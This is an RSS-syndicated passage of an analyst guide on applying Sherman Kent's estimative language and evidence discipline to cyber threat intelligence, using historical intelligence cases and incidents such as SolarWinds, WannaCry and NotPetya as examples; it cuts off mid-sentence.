href="https://github.com/anpa1200">https://github.com/anpa1200</a></li><li><strong>LinkedIn:</strong> <a href="https://www.linkedin.com/in/andrey-pautov/">https://www.linkedin.com/in/andrey-pautov/</a></li></ul><h4><strong>Andrey Pautov</strong></h4><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=34da7917acf0" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0">Operation Desert Hydra — AI-Assisted CTI Pipeline: MuddyWater to Kibana</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Applying Sherman Kent’s Analytic Discipline to CTI: A Practical Analyst Guide]]></title>
<description><![CDATA[Estimative language, evidence discipline, and analytic integrity for cyber threat intelligenceExecutive SummaryThis is an analyst guide, not a formal CTI report. It does not answer a single priority intelligence requirement, assess one actor or campaign end to end, provide an IOC package, or prod...]]></description>
<link>https://tsecurity.de/de/3580440/hacking/applying-sherman-kents-analytic-discipline-to-cti-a-practical-analyst-guide/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580440/hacking/applying-sherman-kents-analytic-discipline-to-cti-a-practical-analyst-guide/</guid>
<pubDate>Mon, 08 Jun 2026 06:38:18 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4>Estimative language, evidence discipline, and analytic integrity for cyber threat intelligence</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*le-GPHh7adFR9iex1Ff7qQ.png"></figure><h3>Executive Summary</h3><p>This is an analyst guide, not a formal CTI report. It does not answer a single priority intelligence requirement, assess one actor or campaign end to end, provide an IOC package, or produce a defensive detection plan. Its purpose is narrower: show how cyber threat intelligence analysts can apply Sherman Kent-style analytic discipline to public evidence without overstating what the evidence proves.</p><p>Sherman Kent was one of the central figures in professionalizing U.S. intelligence analysis. His writing emphasized clear estimative language, policy relevance, analytic independence, evidence discipline, explicit uncertainty, and the separation of fact from judgment (<a href="https://www.cia.gov/resources/csi/studies-in-intelligence/archives/vol-8-no-4/words-of-estimative-probability/">CIA, Words of Estimative Probability</a>; <a href="https://www.cia.gov/readingroom/document/cia-rdp78-04718a000600100003-3">CIA, The Intelligence Process: A Digest from Strategic Intelligence</a>; <a href="https://www.cia.gov/resources/csi/static/Kent-Profession-Intel-Analysis.pdf">CIA, Sherman Kent and the Profession of Intelligence Analysis</a>).</p><p>This article uses <strong>“Kent-style analytic discipline”</strong> as shorthand for that professional tradition. It is not claiming that there is one official, codified “Sherman Kent doctrine” that directly governs modern CTI. The safer claim is that Kent’s principles are consistent with later Intelligence Community analytic standards and structured analytic technique guidance, including ICD 203 and the CIA tradecraft primer (<a href="https://www.dni.gov/files/documents/ICD/ICD-203.pdf">ODNI, ICD 203</a>; <a href="https://www.cia.gov/resources/csi/static/Tradecraft-Primer-apr09.pdf">CIA, A Tradecraft Primer</a>).</p><p>For CTI, this matters because analysts often work from incomplete telemetry, vendor reporting, malware analysis, infrastructure links, victimology, and government attribution statements. Those evidence types do not all prove the same thing. A file hash can support a malware-family claim. A command-and-control pattern can support a campaign link. Victimology can support a targeting assessment. None of those, by itself, proves adversary intent or state tasking.</p><p>This guide therefore focuses on one standard: make the reader see where evidence ends and assessment begins.</p><h3>Table of Contents</h3><p><a href="https://infosecwriteups.com/applying-sherman-kents-analytic-discipline-to-cti-a-practical-analyst-guide-33142ad7553b#4a1e"><strong>Evidence and Confidence Model Used Here</strong></a></p><p><a href="https://infosecwriteups.com/applying-sherman-kents-analytic-discipline-to-cti-a-practical-analyst-guide-33142ad7553b#b693"><strong>Estimative Probability Reference</strong></a></p><p><a href="https://infosecwriteups.com/applying-sherman-kents-analytic-discipline-to-cti-a-practical-analyst-guide-33142ad7553b#8b22"><strong>What Is Sherman Kent-Style Analytic Discipline?</strong></a></p><p><a href="https://infosecwriteups.com/applying-sherman-kents-analytic-discipline-to-cti-a-practical-analyst-guide-33142ad7553b#43ac"><strong>What Maps From Traditional Intelligence to CTI — And What Does Not</strong></a></p><ul><li><a href="https://infosecwriteups.com/applying-sherman-kents-analytic-discipline-to-cti-a-practical-analyst-guide-33142ad7553b#285d"><strong>1. Policy Relevance Without Policy Capture</strong></a></li><li><a href="https://infosecwriteups.com/applying-sherman-kents-analytic-discipline-to-cti-a-practical-analyst-guide-33142ad7553b#18ed"><strong>2. Facts, Assumptions, and Judgments</strong></a></li><li><a href="https://infosecwriteups.com/applying-sherman-kents-analytic-discipline-to-cti-a-practical-analyst-guide-33142ad7553b#c7e3"><strong>3. Estimative Probability Language</strong></a></li><li><a href="https://infosecwriteups.com/applying-sherman-kents-analytic-discipline-to-cti-a-practical-analyst-guide-33142ad7553b#bf34"><strong>4. Confidence Is Not Probability</strong></a></li><li><a href="https://infosecwriteups.com/applying-sherman-kents-analytic-discipline-to-cti-a-practical-analyst-guide-33142ad7553b#bbfe"><strong>5. Alternative Hypotheses</strong></a></li><li><a href="https://infosecwriteups.com/applying-sherman-kents-analytic-discipline-to-cti-a-practical-analyst-guide-33142ad7553b#da72"><strong>6. Warning, Indicators, and Collection Gaps</strong></a></li><li><a href="https://infosecwriteups.com/applying-sherman-kents-analytic-discipline-to-cti-a-practical-analyst-guide-33142ad7553b#796b"><strong>7. Analytic Integrity in CTI</strong></a></li></ul><p><a href="https://infosecwriteups.com/applying-sherman-kents-analytic-discipline-to-cti-a-practical-analyst-guide-33142ad7553b#8e8e"><strong>Cognitive Biases CTI Analysts Should Name</strong></a></p><p><a href="https://infosecwriteups.com/applying-sherman-kents-analytic-discipline-to-cti-a-practical-analyst-guide-33142ad7553b#b411"><strong>Where ATT&amp;CK and the Pyramid of Pain Fit</strong></a></p><p><a href="https://infosecwriteups.com/applying-sherman-kents-analytic-discipline-to-cti-a-practical-analyst-guide-33142ad7553b#99f2"><strong>Kent-Style Checklist</strong></a></p><p><a href="https://infosecwriteups.com/applying-sherman-kents-analytic-discipline-to-cti-a-practical-analyst-guide-33142ad7553b#2ba7"><strong>Practical Analyst Template</strong></a></p><p><a href="https://infosecwriteups.com/applying-sherman-kents-analytic-discipline-to-cti-a-practical-analyst-guide-33142ad7553b#a5ae"><strong>Conclusion</strong></a></p><p><a href="https://infosecwriteups.com/applying-sherman-kents-analytic-discipline-to-cti-a-practical-analyst-guide-33142ad7553b#a513"><strong>References</strong></a></p><h3>Evidence and Confidence Model Used Here</h3><p><strong>This article uses these evidence labels:</strong></p><ul><li><strong>Author-observed:</strong> directly inspected by the author. This article rarely uses this label because it is based on public reporting, not original telemetry or reverse engineering.</li><li><strong>Source-observed:</strong> the cited source claims direct access to evidence, such as imagery, telemetry, malware samples, incident response data, or official records.</li><li><strong>Reported:</strong> stated by a cited source, but not independently verified here.</li><li><strong>Assessed:</strong> analytic judgment made by a cited source.</li><li><strong>Inferred:</strong> reasonable interpretation made in this article from public evidence, but not directly observed.</li></ul><p><strong>Qualifiers are tracked separately from evidence labels:</strong></p><ul><li><strong>Qualifier / limitation:</strong> ambiguity, scope limit, alternate explanation, source-access constraint, or reason the evidence should not be overinterpreted.</li></ul><p><strong>Confidence attaches to a specific assessment, not to an example as a whole:</strong></p><ul><li><strong>High confidence:</strong> strong source access, strong credibility, meaningful corroboration, and a short inference chain.</li><li><strong>Moderate confidence:</strong> credible reporting, but incomplete visibility, limited corroboration, contested interpretation, or a longer inference chain.</li><li><strong>Low confidence:</strong> plausible inference from thin, indirect, or weakly corroborated evidence.</li></ul><p><strong>Every example uses the same four-field confidence basis:</strong></p><ul><li><strong>Source access:</strong> direct telemetry, reverse engineering, official record, government statement, vendor incident response, or secondary reporting.</li><li><strong>Source reliability:</strong> established, unknown, contested, or mixed.</li><li><strong>Information credibility:</strong> corroborated, single-source, inferred, or disputed.</li><li><strong>Author verification:</strong> verified, partially verified, or not independently verified here.</li></ul><p>This is still not a formal source-grading model. Operational CTI should use a more rigorous source reliability and information credibility system, especially when reporting will support security operations, legal action, executive decision-making, or public attribution.</p><h3>Estimative Probability Reference</h3><p>Kent argued that estimative words should not be left to normal conversational ambiguity. Different organizations use different probability bands, but a CTI team should publish and reuse one internal lexicon. A simple working version is:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*O5dwFHm_ncEOU61MI32nLw.png"></figure><p>Probability is not confidence. “Likely” says how probable the judgment is. “Moderate confidence” says how strong the evidentiary basis is.</p><p>These bands are illustrative, not universal; the important control is consistency inside the publishing team.</p><h3>What Is Sherman Kent-Style Analytic Discipline?</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*oXWwShvs3qtrUWIDyfreXQ.png"></figure><p>Kent-style analytic discipline can be reduced to a practical standard: intelligence analysis should help decision-makers reason under uncertainty without hiding the uncertainty. The analyst’s job is not to sound certain. The analyst’s job is to make evidence, assumptions, probability, confidence, alternatives, and collection gaps visible enough that decision-makers understand the basis and limits of the judgment.</p><p>In practice, that means:</p><ol><li><strong>Serve the decision, not the preference:</strong> Intelligence should be relevant to policy or defensive decisions, but analytic judgment should not be shaped to support a preferred outcome.</li><li><strong>Separate facts from estimates:</strong> The analyst should distinguish observed evidence from assumptions, inference, and judgment.</li><li><strong>Use estimative language deliberately:</strong> Words such as “likely,” “probably,” “possible,” and “almost certainly” should communicate probability consistently rather than act as vague hedges.</li><li><strong>State confidence separately from probability:</strong> A judgment can be likely but low confidence if evidence is thin. A judgment can be high confidence but still not certain.</li><li><strong>Expose assumptions and alternatives:</strong> Analysts should test what else could explain the same evidence.</li><li><strong>Identify collection gaps:</strong> A good estimate says what is missing, not only what is believed.</li><li><strong>Preserve analytic integrity:</strong> Intelligence should be candid about uncertainty, source weakness, and dissent.</li></ol><p>This is not a mechanical checklist. It is a writing and reasoning discipline: structure the product so the reader can audit the analytic path.</p><h3>What Maps From Traditional Intelligence to CTI — And What Does Not</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*P_kpV2peYBfbICkYx0HRhg.png"></figure><p>Traditional national-security intelligence and CTI share the same analytic problem: decisions must be made before evidence is complete. Kent-style discipline maps well to CTI in several areas:</p><ul><li><strong>Estimative language:</strong> CTI needs disciplined wording for attribution, intent, targeting, capability, and likelihood of future activity.</li><li><strong>Source access:</strong> CTI must distinguish endpoint telemetry, network logs, malware samples, sinkhole data, victim reporting, vendor clustering, government statements, and media summaries.</li><li><strong>Confidence:</strong> CTI must explain whether confidence comes from direct artifacts, multiple independent sources, long-term tracking, or inference.</li><li><strong>Alternative hypotheses:</strong> CTI must test whether shared infrastructure means same actor, whether victimology means deliberate targeting, and whether malware behavior proves intent.</li><li><strong>Collection gaps:</strong> CTI should turn uncertainty into hunt tasks, telemetry requirements, malware-analysis questions, and intelligence requirements.</li></ul><h4>But not everything transfers cleanly:</h4><ul><li><strong>CTI evidence is often technical and perishable:</strong> Domains, infrastructure, certificates, hashes, and telemetry can age quickly.</li><li><strong>Vendor labels are not legal attribution:</strong> NOBELIUM, APT29, COZY BEAR, and other labels may overlap, but they are not automatically interchangeable.</li><li><strong>Visibility is uneven:</strong> One vendor may see endpoint telemetry, another may see cloud logs, and a government source may have classified access unavailable to public readers.</li><li><strong>Intent is harder than behavior:</strong> Malware execution, credential theft, and lateral movement can be documented technically. Strategic objective usually requires assessment.</li><li><strong>A CTI report needs a scoped question:</strong> This article is a tradecraft guide. A real CTI report would need a PIR, key judgments, actor or campaign scope, timeline, source base, indicators, affected victims or sectors, confidence per judgment, and defensive implications.</li></ul><h3>1. Policy Relevance Without Policy Capture</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*mBQ_-Mvq3kbMpUNRP3Dc0g.png"></figure><p>Kent argued for intelligence that mattered to national decisions. Relevance does not mean advocacy. In CTI terms, the analyst should understand the decision context — patch prioritization, detection engineering, executive risk, incident response, threat hunting, vendor exposure, or public communication — without forcing the evidence to support a preferred action.</p><h4>Example 1: Cuban Missile Crisis imagery supported decision-making without replacing policy judgment</h4><ul><li><strong>Claim:</strong> October 1962 imagery narrowed uncertainty about Soviet offensive missile deployment in Cuba, but did not determine the U.S. policy response.</li><li><strong>Evidence:</strong> U.S. historical records describe a U-2 flight on October 14, 1962 and subsequent photo interpretation that identified Soviet MRBM sites under construction.</li><li><strong>Source access:</strong> Official historical records and archival imagery; reported in U.S. government records, not author-observed here.</li><li><strong>Assessment:</strong> This is a strong national-security example of policy-relevant intelligence: evidence clarified the threat, while the response remained a policy decision.</li><li><strong>Confidence in assessment:</strong> High.</li><li><strong>Confidence basis:</strong> Source access: official records and archival imagery; Source reliability: established; Information credibility: corroborated; Author verification: public records checked, original imagery not independently analyzed here.</li><li><strong>Sources:</strong> <a href="https://history.state.gov/historicaldocuments/frus1961-63v11/d16">Office of the Historian, FRUS chronology</a>; <a href="https://www.archives.gov/milestone-documents/aerial-photograph-of-missiles-in-cuba">National Archives, Aerial Photograph of Missiles in Cuba</a>.</li><li><strong>Qualifier / limitation:</strong> This is not a CTI case. It is used because the evidence-to-decision structure is directly relevant to CTI reporting.</li></ul><p>The CTI translation is straightforward: a malware sample, intrusion timeline, or cloud log can narrow uncertainty, but it does not automatically decide whether the organization should disclose publicly, isolate a business unit, attribute the incident, or notify regulators.</p><h4>Example 2: The 2007 Iran NIE decomposed a broad question into narrower judgments</h4><ul><li><strong>Claim:</strong> The 2007 Iran NIE separated several analytic questions — weaponization, enrichment, intent, and future capability — instead of treating “Iran’s nuclear program” as one indivisible judgment.</li><li><strong>Evidence:</strong> The declassified NIE uses differentiated judgments and confidence levels across related nuclear questions.</li><li><strong>Source access:</strong> Public declassified key judgments; reported by ODNI, not author-observed classified sourcing.</li><li><strong>Assessment:</strong> The product is a useful example of decomposing a broad question into narrower estimative judgments.</li><li><strong>Confidence in assessment:</strong> High for the decomposition claim; low for any claim about policy effect unless separately sourced.</li><li><strong>Confidence basis:</strong> Source access: declassified ODNI key judgments; Source reliability: established; Information credibility: primary public document; Author verification: public text checked, classified sourcing not available.</li><li><strong>Sources:</strong> <a href="https://www.dni.gov/files/documents/Newsroom/Reports%20and%20Pubs/20071203_release.pdf">ODNI, Iran: Nuclear Intentions and Capabilities</a>; <a href="https://www.cia.gov/resources/csi/books-monographs/cia-support-to-policymakers-the-2007-nie-on-irans-nuclear-intentions-and-capabilities/">CIA CSI, 2007 NIE on Iran</a>.</li><li><strong>Qualifier / limitation:</strong> This article does not assess whether the NIE changed policy. It only uses the public product to show disciplined decomposition of judgments.</li></ul><h3>2. Facts, Assumptions, and Judgments</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*f0Wu_l81Mk6vjtKsA73UQA.png"></figure><p>Kent-style analysis requires a visible boundary between what the analyst knows and what the analyst concludes. The most dangerous failures often occur when assumptions are written as if they are evidence.</p><h4>Example 1: Iraq WMD analysis shows the risk of assumption-driven certainty</h4><ul><li><strong>Claim:</strong> The Iraq WMD case is a negative example of insufficiently disciplined separation between evidence, assumptions, and judgment.</li><li><strong>Evidence:</strong> The WMD Commission identified weak collection, analytic errors, and failure to make clear how much analysis rested on assumptions rather than strong evidence.</li><li><strong>Source access:</strong> Official retrospective commission reporting; reported, not author-observed original intelligence.</li><li><strong>Assessment:</strong> The Kent-style lesson is that historical behavior and concealment indicators should not be converted into current capability judgments without showing the inference chain.</li><li><strong>Confidence in assessment:</strong> High for the official finding of intelligence failure; moderate for the article’s specific “assumption-driven certainty” framing.</li><li><strong>Confidence basis:</strong> Source access: official retrospective commission reporting; Source reliability: established; Information credibility: corroborated for broad failure, interpreted for this article’s lesson framing; Author verification: public report checked, original intelligence not available.</li><li><strong>Sources:</strong> <a href="https://govinfo.library.unt.edu/wmd/report/index.html">WMD Commission report index</a>; <a href="https://govinfo.library.unt.edu/wmd/report/transmittal_letter.html">WMD Commission transmittal letter</a>; <a href="https://www.govinfo.gov/content/pkg/GPO-WMD/pdf/GPO-WMD.pdf">GPO WMD Commission PDF</a>.</li><li><strong>Qualifier / limitation:</strong> The Iraq case is not a CTI case. It is included because it is a canonical warning about assumptions, source weakness, and overconfident estimates.</li></ul><p><strong>Correct Kent-style wording would separate:</strong></p><ul><li><strong>Reported:</strong> Iraq had historical WMD programs and had previously concealed activity.</li><li><strong>Reported:</strong> sources and technical indicators were interpreted as suggesting renewed activity.</li><li><strong>Assumed:</strong> past concealment behavior implied possible continuing programs.</li><li><strong>Assessed:</strong> Iraq retained or reconstituted WMD capabilities.</li><li><strong>Collection gap:</strong> direct, reliable access to current program status was limited.</li></ul><p>The failure mode is converting “the regime has concealed WMD before” into “the regime currently has active WMD programs” without making the inferential jump visible enough.</p><h4>Example 2: SolarWinds analysis required separating technical fact from attribution judgment</h4><ul><li><strong>Claim:</strong> SolarWinds reporting should distinguish technical supply-chain compromise from actor attribution and strategic intent.</li><li><strong>Evidence:</strong> CISA reported malicious code inserted into the SolarWinds software lifecycle; CrowdStrike analyzed SUNSPOT’s role in manipulating the build process.</li><li><strong>Source access:</strong> CISA-reported government advisory and CrowdStrike-reported technical analysis; not author-observed here.</li><li><strong>Assessment:</strong> The technical compromise, vendor cluster labels, government attribution, and intent assessment should be written as separate claims.</li><li><strong>Confidence in assessment:</strong> High.</li><li><strong>Confidence basis:</strong> Source access: government advisory and vendor technical analysis; Source reliability: established; Information credibility: corroborated for supply-chain compromise; Author verification: public reports checked, no independent reverse engineering here.</li><li><strong>Sources:</strong> <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-352a">CISA AA20–352A</a>; <a href="https://www.crowdstrike.com/en-us/blog/sunspot-malware-technical-analysis/">CrowdStrike, SUNSPOT</a>.</li><li><strong>Qualifier / limitation:</strong> Public reporting can support strong technical conclusions while still leaving parts of attribution and intent dependent on non-public evidence.</li></ul><p><strong>Kent-style separation:</strong></p><ul><li><strong>Technical behavior:</strong> malicious Orion component inserted into build/update lifecycle.</li><li><strong>Tooling:</strong> SUNSPOT and SUNBURST.</li><li><strong>Vendor/government label:</strong> NOBELIUM, StellarParticle, APT29-style community labels depending on source.</li><li><strong>Attribution:</strong> assessed responsibility by governments or vendors.</li><li><strong>Intent:</strong> assessed intelligence collection or access objective.</li></ul><h3>3. Estimative Probability Language</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*dOK04WErXA1j0WBJz5d0Xw.png"></figure><p>Kent’s “Words of Estimative Probability” addressed a persistent intelligence problem: analysts use words like “possible,” “probable,” and “likely,” but readers may assign different probabilities to the same words. This discipline does not require every estimate to become a math problem. It requires that probability language be intentional and consistent.</p><h4>Example 1: APT28 attribution should preserve source confidence</h4><ul><li><strong>Claim:</strong> Public APT28 attribution language should preserve the source’s estimative wording.</li><li><strong>Evidence:</strong> The linked Google Cloud/Mandiant blog says FireEye assessed APT28 was most likely sponsored by the Russian government and targeted information useful to government interests. Older or fuller Mandiant/FireEye reporting may use different confidence phrasing, so analysts should preserve the exact wording of the specific source they cite.</li><li><strong>Source access:</strong> Vendor reporting based on proprietary analysis; exact source base not fully available to public readers.</li><li><strong>Assessment:</strong> “The cited Google Cloud/Mandiant blog says FireEye assessed APT28 was most likely sponsored by the Russian government” is stronger tradecraft than writing “APT28 is proven to be Russia.”</li><li><strong>Confidence in assessment:</strong> High for the wording recommendation; moderate for public evaluation of the underlying sponsorship claim.</li><li><strong>Confidence basis:</strong> Source access: vendor reporting based on proprietary analysis; Source reliability: established vendor; Information credibility: credible but not fully public; Author verification: linked blog wording checked, underlying evidence not independently verified.</li><li><strong>Source:</strong> <a href="https://cloud.google.com/blog/topics/threat-intelligence/apt28-a-window-into-russias-cyber-espionage-operations">Google Cloud / Mandiant, APT28</a>.</li><li><strong>Qualifier / limitation:</strong> Vendor attribution can be credible without being fully independently auditable from public evidence.</li></ul><p><strong>Kent-style wording:</strong></p><ul><li><strong>Better</strong>: “The cited Google Cloud/Mandiant blog says FireEye assessed APT28 was most likely sponsored by the Russian government.”</li><li><strong>Weaker</strong>: “APT28 is Russian government-directed.”</li><li><strong>Worse</strong>: “APT28 is proven to be Russia.”</li></ul><p>The first version preserves the source, the estimative term, and the fact that the statement is an assessment.</p><h4>Example 2: 2007 Iran NIE showed probability and confidence in the same product</h4><ul><li><strong>Claim:</strong> The 2007 Iran NIE is a useful example of stating confidence levels across separate judgments.</li><li><strong>Evidence:</strong> The declassified NIE differentiates judgments about halted weaponization, enrichment, intent, and future decisions.</li><li><strong>Source access:</strong> Public declassified key judgments; original classified evidence not available here.</li><li><strong>Assessment:</strong> The product demonstrates why broad topics should be decomposed into narrower estimates with separate uncertainty.</li><li><strong>Confidence in assessment:</strong> High.</li><li><strong>Confidence basis:</strong> Source access: declassified ODNI key judgments; Source reliability: established; Information credibility: primary public document; Author verification: public text checked, classified sourcing not available.</li><li><strong>Source:</strong> <a href="https://www.dni.gov/files/documents/Newsroom/Reports%20and%20Pubs/20071203_release.pdf">ODNI, Iran NIE</a>.</li><li><strong>Qualifier / limitation:</strong> Confidence language is not a guarantee of truth. It is a statement about evidentiary strength and analytic basis at the time of the estimate.</li></ul><h3>4. Confidence Is Not Probability</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*PieOUrrsp4VbSGcRInnZpg.png"></figure><p>Probability answers: “How likely is the judgment?” Confidence answers: “How strong is the basis for the judgment?” Analysts often blur these together. Kent-style discipline keeps them separate.</p><h4>Example 1: Iraq WMD showed that high-confidence judgments can still be wrong</h4><ul><li><strong>Claim:</strong> High confidence does not guarantee analytic accuracy if the source base and assumptions are weak.</li><li><strong>Evidence:</strong> Official retrospective reporting found major problems in prewar Iraq WMD assessments, including unsupported or overstated judgments.</li><li><strong>Source access:</strong> Official retrospective investigations and public reporting.</li><li><strong>Assessment:</strong> The case shows why confidence statements must identify source quality, access, corroboration, and assumption sensitivity.</li><li><strong>Confidence in assessment:</strong> High.</li><li><strong>Confidence basis:</strong> Source access: official retrospective investigations; Source reliability: established; Information credibility: corroborated for failure finding; Author verification: public reports checked, original intelligence not available.</li><li><strong>Sources:</strong> <a href="https://www.govinfo.gov/content/pkg/GPO-WMD/pdf/GPO-WMD.pdf">WMD Commission report</a>; <a href="https://www.globalsecurity.org/intell/library/congress/2004_rpt/iraq-wmd_intell_09jul2004_conclusions.htm">Senate Select Committee conclusions via GlobalSecurity mirror</a>.</li><li><strong>Qualifier / limitation:</strong> This does not mean confidence language is useless. It means confidence must be earned and explained.</li></ul><p><strong>Kent-style analysts should ask:</strong></p><ul><li>What are the strongest sources?</li><li>Which sources are single points of failure?</li><li>What assumptions connect the evidence to the judgment?</li><li>What reporting contradicts the judgment?</li><li>What evidence would reduce confidence?</li></ul><h4>Example 2: CTI malware behavior can be high confidence while intent remains moderate confidence</h4><ul><li><strong>Claim:</strong> A CTI product can have high confidence in technical behavior and lower confidence in actor intent.</li><li><strong>Evidence:</strong> Mandiant reporting ties WannaCry to SMBv1/TCP 445 propagation and EternalBlue/MS17–010 exploitation. The U.S. Department of Justice later alleged that a North Korean regime-backed programmer connected to Lazarus Group activity participated in creating the malware used in the WannaCry 2.0 attack.</li><li><strong>Source access:</strong> Mandiant malware analysis reported technical behavior; DOJ charged/alleged DPRK-linked involvement and provided public attribution material; not author-observed here.</li><li><strong>Assessment:</strong> Analysts should assign separate confidence to malware behavior, actor clustering, government attribution, and intent. Government attribution does not remove the need to distinguish technical behavior from strategic motivation.</li><li><strong>Confidence in assessment:</strong> High.</li><li><strong>Confidence basis:</strong> Source access: Mandiant malware analysis and DOJ charging/public attribution material; Source reliability: established; Information credibility: high for SMB/MS17–010 behavior, established public government attribution exists, inferred for intent and internal tasking; Author verification: public reporting checked, no independent malware analysis here.</li><li><strong>Sources:</strong> <a href="https://cloud.google.com/blog/topics/threat-intelligence/wannacry-malware-profile">Mandiant, WannaCry malware profile</a>; <a href="https://cloud.google.com/blog/topics/threat-intelligence/smb-exploited-wannacry-use-of-eternalblue/">Mandiant, WannaCry use of EternalBlue</a>; <a href="https://www.justice.gov/archives/opa/pr/north-korean-regime-backed-programmer-charged-conspiracy-conduct-multiple-cyber-attacks-and">DOJ, North Korean regime-backed programmer charged</a>.</li><li><strong>Qualifier / limitation:</strong> This article does not independently adjudicate the DPRK/Lazarus attribution. It uses the case to show how post-attribution CTI should still separate behavior, attribution, and intent.</li></ul><h3>5. Alternative Hypotheses</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*OgBOQ_0sgEge7IwPdLOr7g.png"></figure><p>Kent-style analysis does not require analysts to treat all hypotheses as equally plausible. It does require analysts to ask what else could explain the evidence and what collection would discriminate between explanations.</p><h4>Example 1: 9/11 warning failure showed the cost of narrow imagination</h4><ul><li><strong>Claim:</strong> The 9/11 case illustrates why warning analysis needs alternative hypotheses before a threat becomes obvious in hindsight.</li><li><strong>Evidence:</strong> The 9/11 Commission identified failures of imagination, policy, capabilities, and management.</li><li><strong>Source access:</strong> Official retrospective commission reporting.</li><li><strong>Assessment:</strong> A warning product should test competing explanations for fragmentary indicators, including low-frequency but high-impact possibilities.</li><li><strong>Confidence in assessment:</strong> High for the broad warning lesson; moderate for any reconstructed pre-attack hypothesis set.</li><li><strong>Confidence basis:</strong> Source access: official retrospective commission reporting; Source reliability: established; Information credibility: corroborated for broad failure categories, illustrative for reconstructed hypotheses; Author verification: public report checked.</li><li><strong>Sources:</strong> <a href="https://www.9-11commission.gov/report/911Report.pdf">9/11 Commission Report PDF</a>; <a href="https://www.ojp.gov/ncjrs/virtual-library/abstracts/911-commission-report-executive-summary">Office of Justice Programs summary</a>.</li><li><strong>Qualifier / limitation:</strong> Hindsight makes patterns look cleaner than they appeared at the time. The goal is humility and better warning structure, not retrospective certainty.</li></ul><p><strong>Possible analytic frame before the attack:</strong></p><ul><li><strong>H1:</strong> Al-Qaida intended overseas attacks against U.S. interests.</li><li><strong>H2:</strong> Al-Qaida intended a major attack inside the United States.</li><li><strong>H3:</strong> Al-Qaida intended aviation-related operations, but the exact target and method were unknown.</li><li><strong>Discrimination:</strong> travel patterns, flight training, visa anomalies, financial movement, communications, and detainee reporting could have been evaluated as indicators across hypotheses.</li></ul><h4>Example 2: NotPetya intent remains an assessed judgment</h4><ul><li><strong>Claim:</strong> NotPetya’s destructive effect is easier to establish publicly than the operators’ internal intent.</li><li><strong>Evidence:</strong> Microsoft reported destructive behavior and enterprise spread; Cisco Talos reported M.E.Doc infrastructure manipulation connected to the outbreak. The UK and U.S. governments publicly attributed NotPetya to the Russian government or Russian military in February 2018, and DOJ later charged GRU Unit 74455 officers in connection with NotPetya and other destructive operations.</li><li><strong>Source access:</strong> Vendor technical analysis, incident reporting, and public government attribution statements.</li><li><strong>Assessment:</strong> Destructive effect should be reported separately from strategic intent even after public government attribution exists.</li><li><strong>Confidence in assessment:</strong> High for destructive effect; moderate for specific intent claims.</li><li><strong>Confidence basis:</strong> Source access: vendor technical reporting and government attribution statements; Source reliability: established; Information credibility: corroborated for destructive effect, public attribution strengthens actor context, internal intent remains inferred; Author verification: public reports checked, no original telemetry review.</li><li><strong>Sources:</strong> <a href="https://www.microsoft.com/security/blog/2017/10/03/advanced-threat-analytics-security-research-network-technical-analysis-notpetya/">Microsoft, NotPetya technical analysis</a>; <a href="https://blogs.cisco.com/security/talos/the-medoc-connection">Cisco Talos, The MeDoc Connection</a>; <a href="https://www.gov.uk/government/news/foreign-office-minister-condemns-russia-for-notpetya-attacks">UK Government, Foreign Office Minister condemns Russia for NotPetya</a>; <a href="https://trumpwhitehouse.archives.gov/briefings-statements/statement-press-secretary-25/">White House, Statement from the Press Secretary</a>; <a href="https://www.justice.gov/opa/pr/six-russian-gru-officers-charged-connection-worldwide-deployment-destructive-malware-and">DOJ, Six Russian GRU officers charged</a>.</li><li><strong>Qualifier / limitation:</strong> Public attribution strengthens the actor context, but it still does not expose every internal objective, command decision, or intended propagation boundary.</li></ul><p><strong>Alternative hypotheses:</strong></p><ul><li><strong>H1:</strong> NotPetya was designed as a destructive state operation using ransomware aesthetics as cover.</li><li><strong>H2:</strong> NotPetya was designed primarily for Ukraine-focused disruption but propagated more broadly than intended.</li><li><strong>H3:</strong> The ransomware presentation reflected mixed objectives or operational cover rather than a pure financial motive.</li></ul><p>The evidence strongly supports destructive effect. It does not publicly prove the internal decision process behind the operation.</p><h3>6. Warning, Indicators, and Collection Gaps</h3><p>Kent-style analysis is not only retrospective. It should produce warning questions and collection requirements. A judgment with no collection gap is often a judgment that has not been examined carefully enough.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*XkXGaxgF5xHc8p4jfSAsBg.png"></figure><h4>Example 1: Cuban Missile Crisis warning depended on collection timing and imagery interpretation</h4><ul><li><strong>Claim:</strong> The Cuban Missile Crisis shows how warning changes as collection improves.</li><li><strong>Evidence:</strong> Official records describe the October 14, 1962 U-2 mission, subsequent photo interpretation, and identification of MRBM sites under construction.</li><li><strong>Source access:</strong> Official records and imagery references.</li><li><strong>Assessment:</strong> Before imagery confirmation, the problem was warning under uncertainty; after imagery, the problem became site status, operational timeline, Soviet intent, and escalation risk.</li><li><strong>Confidence in assessment:</strong> High.</li><li><strong>Confidence basis:</strong> Source access: official records and imagery references; Source reliability: established; Information credibility: corroborated; Author verification: public records checked.</li><li><strong>Sources:</strong> <a href="https://history.state.gov/historicaldocuments/frus1961-63v11/d16">Office of the Historian, FRUS chronology</a>; <a href="https://www.dia.mil/News-Features/Photo-Gallery/igphoto/2000948884/">DIA photo record</a>.</li><li><strong>Qualifier / limitation:</strong> This is a national-security warning example, not a CTI intrusion case.</li></ul><p><strong>Kent-style warning questions:</strong></p><ul><li>What indicators would show offensive missile deployment rather than defensive military aid?</li><li>What collection confirms construction status?</li><li>What evidence 